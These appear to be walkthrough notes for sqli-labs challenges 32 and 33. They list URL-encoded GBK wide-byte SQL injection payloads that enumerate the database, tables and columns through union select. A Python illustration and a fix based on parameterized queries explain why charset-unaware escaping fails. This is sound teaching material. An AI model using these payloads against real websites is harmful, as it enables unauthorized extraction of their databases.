less-32
?id=1%df%27%20and%201=1%20--%20wqe (closes the quote)
?id=1%df%27%20order%20by%203%20--%20wqe
?id=-1%df%27%20union%20select%201,2,3%20--%20wqe
?id=-1%df%27%20union%20select%201,database(),3%20--%20wqe
?id=-1%df%27%20union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=database()%20--%20wqe
?id=-1%df%27%20union%20select%201,2,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x656D61696C73%20--%20wqe
And so on for the remaining columns and tables.
less-33
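The approach is the same as in the previous challenge. The only difference is in the source code: this one escapes the input with a function, whereas the previous one escaped it manually.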
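Why both escaping variants fail in the same way, as an added example that is not part of the original notes: a byte-wise backslash escape is charset-unaware, so under a GBK connection the inserted 0x5c is absorbed as the trail byte of a two-byte character starting with 0xdf. The function names, the GBK connection charset, and the addslashes-style escape model are assumptions made for this illustration.

```python
# Added illustration: byte-wise escaping vs. a multi-byte connection charset.
from urllib.parse import unquote_to_bytes

# Value portion of the first less-32 request on this page, as raw bytes.
SAMPLE = unquote_to_bytes("1%df%27")


def byte_escape(raw: bytes) -> bytes:
    """Charset-unaware escape (assumed model of the lab's filter):
    put a backslash in front of every backslash, single and double quote."""
    out = bytearray()
    for b in raw:
        if b in (0x5C, 0x27, 0x22):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def unescaped_quotes(escaped: bytes, charset: str) -> int:
    """Count single quotes not preceded by a backslash after the bytes
    are decoded the way a server using `charset` would read them."""
    text = escaped.decode(charset, errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2          # backslash plus the character it escapes
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count


def valid_in_charset(raw: bytes, charset: str) -> bool:
    """Defensive check: reject input that is not well-formed in the
    connection charset before it gets anywhere near a query."""
    try:
        raw.decode(charset)
        return True
    except UnicodeDecodeError:
        return False


if __name__ == "__main__":
    escaped = byte_escape(SAMPLE)
    print(escaped.hex(" "))                       # 31 df 5c 27
    print(unescaped_quotes(escaped, "gbk"))       # quote survives under GBK
    print(unescaped_quotes(escaped, "utf-8"))     # quote stays escaped under UTF-8
    print(valid_in_charset(SAMPLE, "gbk"))        # raw input is not valid GBK
```

Validating the encoding is only a stopgap. The durable fix is a parameterized query with the connection charset set through the driver, so that escaping and parsing agree on character boundaries.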